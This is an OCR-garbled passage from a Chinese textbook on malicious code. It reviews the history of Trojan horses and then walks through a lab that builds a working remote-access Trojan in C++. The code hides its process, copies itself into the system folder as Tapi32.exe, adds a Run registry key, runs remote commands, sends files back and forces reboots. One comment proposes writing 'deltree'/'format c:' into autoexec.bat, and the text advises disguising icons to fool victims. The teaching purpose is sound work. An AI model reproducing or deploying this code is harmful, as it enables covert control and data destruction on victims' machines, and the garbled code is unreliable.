为 功能 完善 的 木马 。 这 就 是 图 5-1(c) 的 主要 工作 。 

(4) 使 用 阶段 : 如 图 5-1(d) 所 示 ,木马 与 控制 端的 交互 也 就 是 使 用 阶段 。 该 阶段 就 是 
通过 木马 通道 在 控制 端 和 目标 主机 之 间 进 行 命令 和 数据 的 交互 。 


5.1.5 木马 的 技术 发 展 


从 技术 角度 来 看 ,木马 程序 技术 发 展 至 今 已 经 经 历 了 4 个 阶段 。 

第 一 阶段 主要 实现 简单 的 密码 窃取 、 发 送 等 功能 ,没有 什么 特别 之 处 。 

第 二 阶段 在 技术 上 有 了 很 大 的 进步 ,主要 体现 在 隐藏 .控制 等 方面 。 国 内 的 冰河 可 以 说 
是 这 个 阶段 的 典型 代表 之 一 。 

第 三 阶段 在 数据 传递 技术 上 做 了 不 小 的 改进 ,出 现 了 基于 ICMP 协议 的 木马 ,这 种 木马 
利用 ICMP 协议 的 畸形 报 文 传递 数据 ,增加 了 查 杀 的 难度 。 

第 四 阶段 在 进程 隐藏 方面 做 了 非常 大 的 改动 ,采用 了 内 核 插入 式 的 嵌入 方式 ,利用 远程 
插入 线程 技术 嵌入 DLL 线程 ,或 者 用 挂 接 PSAPI 函数 实现 木马 程序 的 隐藏 。 即 使 在 
Windows NT/Windows 2000 下 ,这 些 技术 都 达到 了 良好 的 隐藏 效果 。 

相信 ,第 五 阶段 木马 的 技术 将 更 加 先进 。 

现在 的 木马 有 很 多 高 级 技巧 可 以 被 程序 员 利 用 、 修 改 并 进一步 传播 。 具 有 新 功能 和 更 
好 加 密 方法 的 木马 每 天 都 在 出 现 , 以 至 于 防 木 马 软件 根本 就 不 能 检测 到 它们 。 木 马 技术 的 
发 展 趋势 如 下 。 

1， 跨 平台 性 

它 主要 是 针对 Windows 系统 而 言 。 木 马 的 使 用 者 当然 希望 一 个 木马 可 以 在 Windows 
95/Windows 98 下 使 用 ,最 好 在 Windows NT/Windows 2000, 甚 至 Windows 7 和 Windows 8 
下 也 可 以 使 用 。 随 着 微软 不 断 推出 新 的 操作 系统 ,安全 性 不 断 加 强 , Windows XP 和 
Windows 2000 采用 了 NT 内 核 ,安全 性 大 幅 提 高 。Windows 7 提供 了 UAC( 用 户 账户 控 
制 )、.ASLR( 地 址 空间 随机 化 ) 等 新 特征 来 对 抗 恶 意 代码 。 因 此 ,能 支持 多 种 平台 的 木马 程 
序 技术 难度 非常 大 。 

2. 模块 化 设计 

似乎 模块 化 设计 是 一 种 潮流 , Winamp 就 是 模块 化 的 典范 。 现 在 的 木马 也 有 了 模块 化 
设计 的 概念 , 像 BO、NetBus 以 及 SUB7 等 经 典 木马 都 有 一 些 优 秀 的 插件 纷纷 问世 ,这 些 都 
是 很 好 的 说 明 。 

3. 更 新 更 强 的 感染 模式 

传统 的 修改 INI 文件 和 注册 表 的 手法 已 经 不 能 满足 木马 的 需要 。 当 前 .很 多 木马 的 感 
染 方式 已 经 开始 悄悄 转变 。 例 如 ,YAI 木马 事件 就 给 了 人 们 很 多 的 启发 ,该 木马 像 病毒 一 
样 感染 Windows 下 的 文件 , 它 给 攻防 双方 都 带 来 很 多 启发 。 

4. 即时 通知 

木马 是 否 已 经 装 入 ? 目标 在 哪里 ? 如 果 中 木马 的 人 使 用 固定 IP 的 话 , 比 较 容易 解决 这 
些 问 题 。 如 果 目 标 机 使 用 的 是 动态 IP, 应 该 怎么 办 ? 使 用 常用 的 扫描 方法 ,速度 太 慢 。 目 
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前 ,个 别 木马 已 经 有 了 即时 通知 的 功能 ,它们 利用 诸如 IRC、ICQ 等 即时 消息 工具 通知 控 
制 端 。 

5. 更 强 更 多 的 功能 

木马 制作 者 的 欲望 都 是 无 止境 的 ,每 当 实现 强大 功能 的 时 候 , 他 们 就 期 望 更 强大 的 功 
能 。 以 后 的 木马 的 功能 会 如 何 呢 ? 也 许 会 让 人 们 大 吃 一 惊 的 。 


5.2 简单 木马 程序 实验 


由 于 很 多 新 手 对 安全 问题 了 解 不 多 ,因此 并 不 知道 自己 的 计算 机 中 了 “木马 ”后 该 怎么 
去 清除 。 如 果 想 要 有 效 地 发 现 并 清除 木马 ,最 关键 的 还 是 要 知道 木马 的 工作 原理 。 用 木马 
程序 进行 网 络 入 侵 , 从 过 程 上 看 大 致 可 分 为 6 步 : 配置 木马 (实现 伪装 和 信息 反馈 ) ,传播 森 
马 ( 通 过 E-mail\ 病 毒 和 软件 等 )、 运 行 木马 \ 信 息 获取 、 建 立 连 接 和 远程 控制 (实现 对 受害 者 
的 控制 )。 其 中 建立 连接 的 过 程 如 图 5-2 所 示 。 
控制 端 服务 端 


(1) 建立 连接 前 76|26 | B 


202.120.0.100 加 全 


D 通过 信息 || 反 馈 或 IP 扫 
(2) 获得 服务 器 端 IP 描 获 得 服 || 务 器 IP 地 址 


(EY) 


t 


(3) 森马 连接 建立 站 


76|26 | B 


202.120.0.100 @= 202.99.99.101 


名 控制 端 P ;人 @ 木马 端口 ; @ 服务 端 端口 ; @ 服务 端 IP 
图 5-2 木马 建立 连接 示意 图 


在 图 5-2 中 ,A 机 为 控制 端 ,B 机 为 服务 端 。 对 于 A 机 来 说 ,要 与 B 机 创建 连接 就 必须 
知道 B 机 的 木马 端口 和 IP 地址 ,由 于 木马 端口 是 A 机 事先 设 定 的 ,因此 最 重要 的 是 如 何 获 
得 B 机 的 IP 地址。 获得 BB 机 的 IP 地 址 的 方法 主要 有 两 种 : 信息 反馈 和 IP 扫描。 信息 反 
馈 是 指 服务 端 主动 反馈 信息 给 控制 端 。 因 为 B 机 装 有 木马 程序 ,所 以 它 的 木马 端口 7626 
是 处 于 开放 状态 的 ,因此 现在 A 机 只 要 扫描 IP 地 址 段 中 7626 端口 开放 的 主机 就 行 了 。 图 
中 B 机 的 IP 地 址 是 202. 99. 99.101, 当 A 机 扫描 到 这 个 IP 时 发 现 它 的 7626 端口 是 开放 
的 ,那么 这 个 IP 就 会 被 添加 到 列表 中 ,这 时 A 机 就 可 以 通过 木马 的 控制 端 程序 向 B 机 发 出 
连接 信和 号,B 机 中 的 木马 程序 收 到 信和 号 后 立即 做 出 响应 , 当 A 机 收 到 响应 的 信号 后 ,开启 一 
个 随机 端口 1037 与 B 机 的 木马 端口 7626 建立 连接 ,这 时 一 个 木马 连接 才 算 真正 建立 。 由 
于 拨号 上 网 的 IP 是 动态 的 , 即 每 次 上 网 的 IP 都 是 不 同 的 ,但 是 这 个 IP 是 在 一 定 范围 内 变 
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动 的 ,因此 ,一 般 来 说 控制 端 都 是 先 通过 信息 反馈 获得 服务 端的 IP 地 址 ,然后 再 进行 IP 
扫描 。 

自从 1998 年 “ 死 牛 崇拜 "黑客 小 组 公布 BO(Back Orifice) 以 来 ,木马 犹如 平地 上 的 惊 
雷 ,使 中 国 网 民 从 五 彩 缤纷 的 网 络 梦 中 惊醒 ,终于 认识 到 网 络 也 有 它 邪 恶 的 一 面 。 其 实 也 不 
必 太 担心 自己 的 计算 机 是 否 被 别人 种 了 木马 ,我 们 可 以 通过 进一步 学 习 它 .了解 它 , 并 且 进 
一 步 编 写 它 ,来 认 清 木马 的 真实 面目 。 

木马 一 定 是 由 两 部 分 组 成 , 即 服 务 器 程序 (Server) 和 客户 端 程序 (Client) ,服务 器 负责 
打开 攻击 的 道路 ,就 像 一 个 内 奸 特务 。 客 户 端 负 责 攻 击 目标 ,两 者 需要 一 定 的 网 络 协议 
(TCP/IP、.UDP ICMP 等 协议 ) 来 进行 通信 。 

【实验 目的 】 

掌握 木马 病毒 的 基本 原理 。 

【实验 平台 】 

(1) Windows XP 操作 系统 。 

(2) Visual Studio 6. 0 编程 环境 。 

【实验 步骤 】 

(1) 复制 实验 文件 到 实验 的 计算 机 上 (源码 位 置 : 本 书 配 套 素材 目录 \Experiment\ 
SimpleHorse\)。 其 中 ,SocketListener 目录 下 是 木马 Server 端 源 代码 ,SocketCommand 目 
录 下 是 木马 Client 端 源 代码 。 

(2) 用 Visual Studio 6. 0 环境 分 别 编译 这 两 部 分 代码 编译 。 

(3) 运行 SocketListener 应 用 程序 ,也 就 是 启动 了 木马 被 控制 端 。 

(4) 运行 SocketCommand 应 用 程序 ,也 就 是 启动 了 木马 的 控制 端 ,可 以 在 控制 端 执 行 
命令 来 控制 被 控制 端 。 关 于 实验 支持 的 命令 如 表 5-1 所 示 。 


表 5-1 实验 程序 支持 命令 列表 


命 令 命令 含义 
CMD 执行 应 用 程序 
! SHUT 退出 木马 
FILEGET 获得 远 端 文件 
EDITCONF 编辑 配置 文件 
LIST 列 目录 
VIEW 查看 文件 内 容 
CDOPEN 开 CD 
CDCLOSE 关 
REBOOT 重启 远 端 计算 机 


【程序 源码 】 

接 下 来 就 具体 介绍 如 何 编写 一 个 简单 木马 。 首 先 要 选择 熟悉 的 编程 工具 。 目 前 流行 的 
开发 工具 有 C++ Builder、VC、VB 和 Delphi, 这 些 语 言 都 各 有 利弊 ,可 以 根据 自己 的 喜好 进 
行 选择 。 为 了 保持 风格 一 致 ,本 书 选 用 VC++ 为 编程 语言 。“ 死 牛 崇拜 ?黑客 小 组 公布 的 
BO2000 源 代码 也 是 用 VC++ 编 写 的 。 
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启动 VC++ 6.0 企业 版 ,新 建 一 个 基于 对 话 框 的 工程 。 以 CSocket 为 基 类 生成 
CMySocket 类 。CMySocket 类 的 功能 是 使 本 程序 变 成 一 个 服务 器 程序 ,可 以 对 外 服务 (对 
攻击 者 敞开 大 门 )。 木 马 的 Server 端 需要 隐藏 ,因此 ,窗口 对 木马 Server 端 来 说 就 是 一 个 累 
袭 。 在 本 书 中 ,为 了 演示 的 需要 ,仍然 在 Server 端 选择 了 窗 体 。 当 个 人 编写 木马 程序 的 时 
候 ,直接 用 控制 台 程 序 就 可 以 了 。 


5.2.1 自动 隐藏 


首先 应 该 让 木马 程序 能 够 隐身 ,这 里 的 隐身 不 仅仅 是 隐藏 窗口 ,而 是 让 任务 管理 器 也 看 
不 到 木马 进程 ,这 样 就 增强 了 木马 的 存活 能 力 。 在 Visual Studio 重 载 对 话 框 窗 体 中 添加 
OnCreate 事件 响应 函数 ,在 OnCreate 函数 中 添加 可 使 木马 在 Windows 9x 中 隐藏 的 代码 。 
在 Windows 9x 中 ,有 一 种 被 称 为 服务 (Service) 的 后 台 进 程 ,该 进程 可 以 运行 在 较 高 的 优先 
级 下 ,非常 类 似 于 系统 核心 的 设备 驱动 程序 。 因 此 ,只 要 将 木马 程序 在 进程 数据 库 中 用 
RegisterServiceProcess 函数 注册 成 服务 进 oy (Service Process) 就 可 以 了 。 由 于 
RegisterServiceProcess 是 核心 级 函数 ,没有 正式 公开 ,因此 ,只 好 到 KERNEL32. DLL 中 动 
态 装载 它 了 。 实 现代 码 如 下 。 

// Windows 9x 隐藏 技术 

DWORD dwVersion = GetVersion(); 

// 得 到 操作 系统 的 版 本 号 

if (dwVersion > = 0x80000000) 

// 操作 系统 是 Windows 9x, 不 是 Windows NT 
{ 


typedef DWORD (CALLBACK * LPREGISTERSERVICEPROCESS) (DWORD,DWORD); 
// 定 义 RegisterServiceProcess() 函数 的 原型 
HINSTANCE hDLL; 
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess; 
hDLL = LoadLibrary("KERNEL32.d11"); 
// 加 载 RegisterServiceProcess() 函 数 所 在 的 动态 链接 库 KERNEL32. DLL 
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress( 
hDLL, "RegisterServiceProcess" ); 
// 得 到 RegisterServiceProcess() 函 数 的 地 址 
lpRegisterServiceProcess(GetCurrentProcessId(),1); 
// 执 行 RegisterServiceProcess() 函 数 , 隐 藏 本 进程 
FreeLibrary( hDLL); 
// 印 载 动 态 链接 库 
} 


这 样 就 实现 了 木马 进程 在 Windows 9x 操作 系统 下 的 隐藏 。 为 什么 要 判断 操作 系统 的 
版 本 呢 ? 这 是 因为 Windows 2000( 包 括 Windows NT) 的 进程 管理 器 可 以 对 后 台 进 程 一 览 
无 余 , 上 述 代码 就 不 起 作用 了 。Windows NT/Windows 2000 下 实现 隐藏 的 技术 不 是 一 段 
代码 所 能 解决 的 问题 , 接 下 来 将 讨论 相关 技术 。 读 者 可 以 根据 提供 的 方法 来 实现 Windows 
NT 下 的 隐藏 。 


5.2.2 自动 加 载 
木马 在 受害 者 的 计算 机 上 的 第 一 次 运行 肯定 是 诱骗 执行 的 。 第 一 次 运行 的 时 候 木马 要 
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做 些 什么 工作 呢 ? 首先 ,木马 要 自我 复制 一 份 到 特定 位 置 ( 如 %System% 目 录 下 ), 以 备 自 
动 加 载 时 使 用 。 其 次 ,修改 必要 配置 ,实现 计算 机 启动 时 完成 自动 加 载 过 程 。 在 此 ,采用 了 
一 种 最 经 典 也 是 最 常用 的 自动 加 载 技术 : 通过 修改 注册 表 实 现 自动 加 载 。 代 码 如 下 。 


// 修 改 注 册 表 实现 自动 加 载 
char TempPath[ MAX_PATH]; 
GetSystemDirectory(TempPath , MAX_PATH) ; 

// 获 得 系统 目录 缓冲 区 的 地 址 , MAX_PATH 是 缓冲 区 的 大 小 ,得 到 目标 机 的 System 目录 路 径 
CString SystemPath = (CString)TempPath; 


CString commandline = (CString)GetCommandLine(); 
commandline = commandline.Mid( commandline.Find(\"') +1 ); 
commandline = commandline.Left( commandline.Find(\"') ); 
// 获 得 木马 自身 的 位 置 


CopyFile( command]line，SystemPath + "\\Tapi32. exe", FALSE); 
// 将 自己 复制 到 % System% 目录 下 ,并 改名 为 Tapi32. exe, 伪 装 起 来 


CRegKey * registry = new CRegKey(); 
// 定 义 一 个 CRegKey 对 象 ,准备 修改 注册 表 , 这 一 步 必 不 可 少 


registry— > Open(HKEY LOCAL MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run"); 
// 打 开 键 值 HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\crossbow 

// 如 果 不 存在 ,就 创建 它 
unsigned long lRegLength; 
registry 一 > QueryValue( TempPath, "crossbow", &lRegLength); 


CString strTemp = (CString)TempPath; 

If ( strTemp != SystemPath+ "\\Tapi32. exe" ){ 

registry 一 > SetValue(SystemPath + "\\Tapi32. exe", "crossbow" ); 

// 查 找 是 否 有 "crossbow" 字 样 的 键 值 , 并 且 是 否 为 复制 的 目录 % System% + Tapi32. exe 
// 如 果 不 是 ,就 写 人 以 上 键 值 和 内 容 


delete registry; 


// 释 放 指针 


通过 这 段 代 码 ,木马 把 自己 复制 到 了 系统 目录 下 ,并且 把 自己 改 成 一 个 类 似 于 系统 文件 


的 名 称 一 


Tapi32. exe。 


F 是 , 当 用 户 每 次 启动 计算 机 时 ,都 会 自动 加 载 Tapi32. exe。 木 


马 的 骏 形 已 经 形成 了 , 接 下 来 添加 一 些 控制 功能 ,实现 一 些 简 单 的 远程 操作 。 


5.2.3 实现 Server 端 功能 


1. 命令 接收 
接 下 来 启动 Server 端的 Socket 来 接收 客户 端的 命令 。 程 序 中 将 Port 设 为 777, 这 就 是 
木马 的 端口 号 ,当然 也 可 以 选用 别 的 数字 (1 一 65535) 。 但 是 要 注意 尽量 不 要 使 用 1024 以 下 


和 低 端 端口 ,因为 这 样 不 但 可 能 会 与 基本 网 络 协议 使 用 的 端口 相 冲 突 , 而 且 很 容易 被 发 觉 ， 
所 以 尽量 使 用 1024 以 上 的 高 端 端口 (不 过 也 有 这 样 一 种 技术 , 它 故 意 使 用 特定 端口 ,如 果 引 
起 冲突 ,Windows 也 不 会 报错 ) 。 接 收 并 解析 命令 的 代码 如 下 。 
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char * lpBuf; 


lpBuf = new char [1000]; 
for(int i=0;i<1000;i++) 


* (lpBuf +i) = 0; 
} 
// 定 义 并 且 清 空 缓冲 区 


pSocket — > Receive( 1pBuf, 1000); 
// 接 收 客户 端 数据 


if(strnicmp(1pBuf, "CMD:", 4) == 0){ 
ExecuteCommand( lpBuf , FALSE); 
}// 执 行 远 端 应 用 程序 
else if(strnicmp(1pBuf, "!SHUT",5) == 0){ 
SendText( "Exit program!", pSocket ); 
OnExit(); 
}// 退 出 木马 程序 
else if(strnicmp(1pBuf, "FILEGET:",8) == 0){ 
if(!SendFile(1lpBuf, pSocket)){ 
pSocket 一 > Send(" -1",2); 
} 
}// 获 得 远 端 文件 
else if(strnicmp(1pBuf, "EDITCONF:", 9) ==0){ 
ExecEditCommand( lpBuf, pSocket ); 
}// 编 辑 配 置 文件 
else if(strnicmp(1lpBuf, "LIST:", 5) == 0){ 
ExecListCommand( lpBuf, pSocket ); 
}// 列 目录 
else if(strnicmp(1pBuf, "VIEW:", 5) == 0){ 
ExecViewCommand( lpBuf , pSocket); 
}// 查 看 文件 内 容 
else if(strnicmp(1lpBuf, "CDOPEN:", 7) == 0){ 
ExecCDOpenCommand( pSocket ); 
}// 打 开 CD - ROM 
else if(strnicmp(1lpBuf, "CDCLOSE:", 8) == 0){ 
ExecCDCloseCommand( pSocket ); 
}// 关 闭 CD ROM 
else if(strnicmp(1pBuf, "REBOOT:", 7) == 0){ 
ExecRebootCommand( pSocket ); 
}// 远 程 重启 动 


delete [] lpBuf; 
// 释 放 缓冲 区 指针 


2. 修改 配置 
这 部 分 代码 实现 了 修改 目标 机 的 几 种 配置 文件 功能 。 接 下 来 的 代码 可 以 实现 对 


Autoexec. bat 和 Config. sys 两 个 文件 的 修改 。 根 据 这 段 代 码 可 以 轻松 扩 


的 修改 。 


展 到 对 其 他 文件 


132 计算 机 病毒 与 恶意 代码 一 原理、 技术 及 防范 (第 4 版 ) 


CString strResult; 

int number = strBuf. GetLength( ); 

// 得 到 字符 串 的 长 度 

char file _ type = strBuf.GetAt(10); 

// 第 10 个 字符 存 人 file_type 变量 ,用 于 标示 要 编辑 的 是 哪 一 个 文件 
CString content = strBuf. Mid(12); 

// 余 下 的 字符 串 将 被 作为 写 人 的 内 容 写 人 目标 文件 


_chmod("c:\autoexec. bat", S_IREAD | S_IWRITE); 
_chmod("c:Nconfig. sys", S_IREAD | S_IWRITE); 
// 将 两 个 目标 文件 的 属性 改 为 可 读 可 写 


FILE * fp= NULL; 

char filename[ 20]; 

证 (file type== '1'){ 

sprintf(filename," % s","c:\autoexec. bat"); 
// 如 果 第 11 个 字符 是 1, 准 备 处 理 Rutoexec. bat 
}else if(file type== '2'){ 
sprintf(filename,"% s","c:\config. sys"); 
// 如 果 第 11 个 字符 是 2, 准备 处 理 Config. sys 

} 


int times of try=0; 

// 定 义 计数 器 

while(fp== NULL) 

// 如 果 指 针 是 空 

fp = fopen(filename, "a+ "); 

// 如 果 文 件 不 存在 ,创建 之 ; 如 果 存 在 ,准备 在 其 后 添加 

// 如 果 出 错 , 文 件 指针 为 空 ,这 样 就 会 重复 

times_of try= times of try+1; 

// 计 数 器 加 1 

if(times of try> 100) 

4. 
// 如 果 已 经 试 了 100 次 了 , 仍 未 成 功 ,退出 
strResult. Format( "%s, %s, %Ss", "Edit Conf File ", filename, " Error!"); 
SendText( strResult, pSocket ); 
return; 

EL 

上 


fwrite(content, sizeof (char), strlen(content), fp); 

// 写 人 添加 的 语句 ,例如 deltree -YC: 或 者 format - qcC: 
fclose(fp); 

// 写 完 后 关闭 目标 文件 


strResult. Format( "Edit Conf File %s Successful!", filename); 
SendText( strResult, pSocket ); 
// 返 回信 息 到 控制 端 


AS 


第 5 章 特洛伊 木马 133 


3. 实现 list 命令 
有 了 修改 文件 的 功能 ,怎样 才能 找到 目标 文件 呢 ? 当然 是 实现 列 目录 功能 了 。 下 面 的 
代码 实现 查看 目标 机 上 的 目录 树 和 文件 ,这 类 似 于 DOS 下 的 dir 命令 。 


CString strResult; 
// 如 果 前 5 个 字符 是 "LIST:" 
int number = strBuf. GetLength( ); 
// 得 到 字符 串 的 长 度 
CString Dir_Name = strBuf.Mid(6); 
// 从 字符 串 第 六 个 字符 开始 ,将 后 面 的 字符 存 人 Dir_Name 变量 ,这 是 目录 名 
if (Dir_Name== "") 
{ 
// 如 果 目 录 名 为 空 
SendText ("Fail By Open DIR's Name", pSocket); 
// 返 回 "Fail By Open DIR's Name" 信 息 
return; 


: 


SetCurrentDirectory( (LPCTSTR)Dir Name ); 
// 设 置 当前 目录 
CEileFind finder; 
BOOL bWorking = finder.FindFile("*.*"); 
while (bWorking) 
// 循 环 得 到 下 一 层 文件 或 目录 
{ 
bWorking = finder. FindNextFile( ); 
if ( finder. IsDots() || finder. IsDirectory() ){ 
strResult = "Dire: "; 
}else{ 
strResult = "File: "; 
} 
strResult += finder. GetFileName( ); 
strResult += "\n"; 


| 


SendText( strResult, pSocket ); 
// 返 回 Return_Text 变量 的 内 容 


4. 实现 View 命令 
接 下 来 实现 查看 指定 文件 内 容 的 功能 。 这 个 功能 类 似 于 DOS 下 的 type 命令 。 这 部 分 
的 代码 如 下 。 


CString strResult; 

// 如 果 前 5 个 字符 是 "View:" 

int number = strBuf. GetLength( ); 
CString File Name= strBuf.Mid(6); 
// 将 目标 文件 流 存 人 File_Name 变量 中 
int times of try= 0; 


134 计算 机 病毒 与 恶意 代码 一 一 原理 ,技术 及 防范 (第 4 版 ) 


FILE * fp= NULL; 
while(fp== NULL) 
{ 
fp= fopen( (LPCSTR)File Name, "r"); 
// 打 开 目 标 文件 准备 读 
times of try= times of try+1; 
// 计 数 器 加 1 
if(times of try> 100) 
{ 
// 如 果 已 试 了 100 次 了 
SendText ("Fail By Open File", pSocket); 
// 返 回 "Fail By Open File" 的 错误 信息 


return; 


} 


strResult = ""; 

char temp_content[300]; 

for(int i=0;i<300;it+) temp content[i] = \0'; 

// 定 义 一 个 空 数组 

int Read_Num = fread( temp_content, 1, 300, fp); 

// 从 目标 文件 中 读 入 前 300 个 字符 

while(Read Num == 300) 

{ 
strResult += (CString)temp_content; 
//strResult 的 内 容 加 上 刚才 的 字符 
for(int i=0;i<300;i++) temp_content[i] = \0'; 
Read_Num = fread( temp_content, 1, 300, fp); 
// 重 复 

}; 


strResult += (CString)temp_content; 
//strResult 的 内 容 加 上 刚才 的 字符 
fclose(fp); 

// 关 闭 目 标 文件 

SendText( strResult, pSocket); 

// 返 回 strResult 的 内 容 , 即 查看 文件 的 内 容 


5. 操作 硬件 

除了 操作 软件 之 外 ,还 可 以 通过 命令 控制 目标 机 上 的 硬件 (如 打印 机 、 光 驱 等 )。 下 面 以 
控制 目标 机 上 的 光驱 为 例 进 行 简单 介绍 。 代 码 的 实现 采用 mciSendString 函数 ,该 函数 的 
声明 在 mmsystem. h 头 文件 中 ,编译 时 需要 Winmm. lib 支持 。 代 码 实 现 如 下 。 

// 如 果 收 到 的 是 CDOPEN 命令 


mciSendString( "set cdaudio door open", NULL, 0, NULL); 


// 就 弹出 光驱 的 托盘 
SendText( "CDOPEN Successful!", pSocket); 
// 返 回信 息 到 控制 端 


AS 
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// 如 果 收 到 的 是 CDCLOSE 命令 

mciSendString( "Set cdaudio door closed wait", NULL,0,NULL); 

// 就 收回 光驱 的 托盘 . 当然 也 可 以 设置 一 个 死 循 环 , 让 目标 机 的 光驱 来 回 进出 
SendText( "CDCLOSE Successful!", pSocket); 

// 返 回信 息 到 控制 端 


6. 远程 reboot 

然后 就 是 使 目标 机 重新 启动 。 但 这 里 要 区 分 Windows NT 和 Windows 9x, 因为 
Windows NT 非常 注重 系统 每 个 用 户 进 程 的 权限 ,一 个 普通 的 进程 不 具备 调用 系统 功能 的 
权利 ,因此 ,要 赋予 本 程序 足够 的 权限 。 具 体 实现 如 下 。 


DWORD dwVersion = GetVersion(); 

// 得 到 操作 系统 的 版 本 号 

if (dwVersion < 0x80000000) 

{ 

// 操 作 系统 是 Windows NT, 不 是 Windows 9x 
HANDLE hToken; 

TOKEN_PRIVILEGES tkp; 

// 定 义 变量 

OpenProcessToken( GetCurrentProcess(), 

TOKEN_ADJUST_ PRIVILEGES | TOKEN QUERY，&hToken) ; 
//openProcessToken( ) 这 个 函数 的 作用 是 打开 一 个 进程 的 访问 令 牌 
//GetCurrentProcess( ) 函 数 的 作用 是 得 到 本 进程 的 句柄 
LookupPrivilegeValue( NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid); 
//LookupPrivilegeValue() 的 作用 是 修改 进程 的 权限 
tkp. PrivilegeCount = 1; 

// 赋 给 本 进程 特权 

tkp. Privileges[0].Attributes = SE_PRIVILEGE ENABLED; 
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN PRIVILEGES)NULL, 0); 
//adjustTokenPrivileges() 的 作用 是 通知 Windows NT 修改 本 进程 的 权利 
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0); 

// 强 行 退出 Windows NT 并 重启 

} 

else ExitWindowsEx(EWX_FORCE + EWX_REBOOT, 0); 

// 强 行 退出 Windows 9x 并 重启 

SendText( "Reboot Successful!", pSocket); 

// 返 回信 息 到 控制 端 


到 此 为 止 , 我 们 的 木马 程序 已 经 初 具 规 模 , 并 且 还 能 做 很 多 事情 ,如 控制 硬件 、 修 改 配 置 
等 。 尽 管 如 此 ,这 个 木马 也 仅仅 实现 了 一 些 简 单 的 功能 ,有 机 会 可 以 看 看 BO2000 的 源 代 
码 , 用 它 来 充实 一 下 自己 编写 的 木马 程序 。 


5.2.4 实现 Client 端 功能 


客户 端 程序 其 实 是 很 简单 的 , 它 不 需要 隐藏 .自动 加 载 等 高 深 的 技术 。 它 的 任务 仅仅 是 
发 送 命令 和 接收 反馈 信息 。 首 先 ,在 Visual Studio 环境 下 新 建 一 个 基于 Dialog 的 应 用 程 
序 。 接 着 ,在 这 个 窗 体 上 放置 一 些 控件 。 这 些 控件 用 于 输入 IP、Port、 命 令 以 及 执行 某 些 动 
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作 。 最 后 ,添加 CCommandSocket 类 (其 基 类 是 CSocket 类 ) 到 当前 工程 ,该 类 用 于 和 
Server 端 通信 。 
实现 客户 端 和 服务 器 端 连接 的 代码 如 下 。 


int status = FALSE; 

m ptrComSocket = new CCommandSocket (this); 

if (!m_ ptrComSocket — > Create(0, SOCK_STREAM) ){ 

status = FALSE; 

AfxMessageBox(MSG_SOCKET CREAT FAIL); 

} 

else if(!m ptrComSocket — > Connect( (LPCTSTR)m ip, atoi(m port))) { 
status = FALSE; 

AfxMessageBox(MSG SOCKET CONCT FAIL); 

i 

else{ 

status = TRUE; 

}; 

if(status == FALSE){ 

delete m ptrComSocket; 

m_ ptrComSocket = NULL; 

m nConnected = FALSE; 

GetDlgItem( IDC_TEXT) — > SetWindowText("Connection to " +m ip+" failed"); 


else{ 

m_nConnected = TRUE; 

CString csAddr; 

UINT nPort; 

m ptrComSocket - > GetSockName( csAddr, nPort); 

m_csCommanderPort. Format(" %d",nPort); 

GetDlgItem( IDC_ TEXT) — > SetWindowText (csAddr + " successfully connected to " +m_ ip); 
UpdateData( FALSE) ; 

} 


发 送 命令 的 代码 如 下 。 


m_ptrComSocket ~ > Send( (void * )m msg, m msg.GetLength() ); 
ReceiveResult(m msg); // 从 服务 器 端 获取 反馈 信息 


断 开 Socket 通信 的 代码 如 下 。 
m ptrComSocket 一 > Close( ); 


delete m ptrComSocket; 


至 此 ,木马 写 完 了 。 它 仅仅 演示 了 一 些 原理 性 的 东西 ,程序 界面 非常 简陋 。 如 果 对 简陋 
的 界面 不 满意 ,可 以 利用 VC++ 的 高 深 技术 进行 美化 。 对 于 Server 端 ,可 以 选 一 个 足以 迷惑 
人 的 图 标 ( 例 如 , 选 一 个 目录 模样 的 图 标 ) 进 行 编译 ,这 样 不 但 使 受害 者 容易 中 木马 ,而 且 便 
于 隐藏 自己 。 
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5.2.5 实施 阶段 


在 实施 阶段 ,要 想 尽 一 切 办 法 把 Server 程序 放 到 受害 者 的 计算 机 上 ,然后 诱骗 他 们 执 
行 一 次 木马 程序 。 在 得 到 目标 机 的 IP 后 ,启动 Client 程序 ,连接 到 目标 机 的 777 端口 。 连 
接 成 功 后 ,就 可 以 操作 目标 机 了 。 输 入 “edit conf 1” 编 辑 Autoexec. bat 文件 .输入 “edit conf 
2” 编 辑 Config. sys 文件 .输入 “list: xxx”(xxx 是 目录 名 ) 可 以 看 到 目录 和 文件 .输入 “view 
xxx” 可 以 查看 任何 文件 。 还 有 其 他 命令 ,可 以 慢 慢 测试 。 

以 上 只 是 一 个 简单 的 例子 ,真正 写 起 木马 来 要 解决 的 技术 问题 比 这 多 得 多 ,这 需要 扎实 
的 编程 功底 和 丰富 的 经 验 。 下 列 问 题 就 值得 仔细 考虑 : 程序 的 大 小 问题 .启动 方式 的 选择 、 
木马 的 功能 扩充 、 关 掉 防 火 墙 和 杀毒 软件 .针对 来 自 反 汇编 工具 的 威胁 以 及 自动 印 载 等 。 


5.3 木马 程序 的 关键 技术 


虽然 木马 程序 千变万化 ,但 其 攻击 方式 是 一 样 的 : 通过 Client 端 程序 向 Server 端 程序 
发 送 指令 ,Server 端 接收 到 控制 指令 后 ,根据 指令 内 容 在 本 地 执行 相关 程序 段 ,然后 把 执行 
结果 返回 给 Client 端 。 

在 5. 2 节 实 现 了 一 个 基本 的 木马 系统 ,该 系统 包含 几 种 基本 技术 : 自动 隐藏 技术 、 自 动 
加 载 技术 、 信 息 获取 、 硬 件 操作 、 远 程 重新 启动 等 。 尽 管 该 系统 已 经 具有 木马 系统 的 骏 
形 , 但 是 它 还 不 是 一 个 功能 完整 的 木马 系统 。 接 下 来 介绍 一 些 广泛 应 用 于 木马 程序 的 关 
键 技术 。 


5.3.1 植 入 技术 


木马 植 和 技术 是 木马 工作 流程 的 第 一 个 步骤 , 它 也 是 木马 能 不 能 成 为 实战 工具 的 先决 
条 件 。 

1. 常用 的 植 入 手段 

(1) 邮件 植 和 人。 木马 被 放 在 邮件 的 附件 中 发 给 受害 者 , 当 受 害 者 在 没 采取 任何 措施 的 
情况 下 下 载 并 运行 了 该 附件 , 便 中 了 木马 。 因 此 ,对 于 带 有 附件 的 邮件 ,最 好 不 要 下 载运 行 ， 
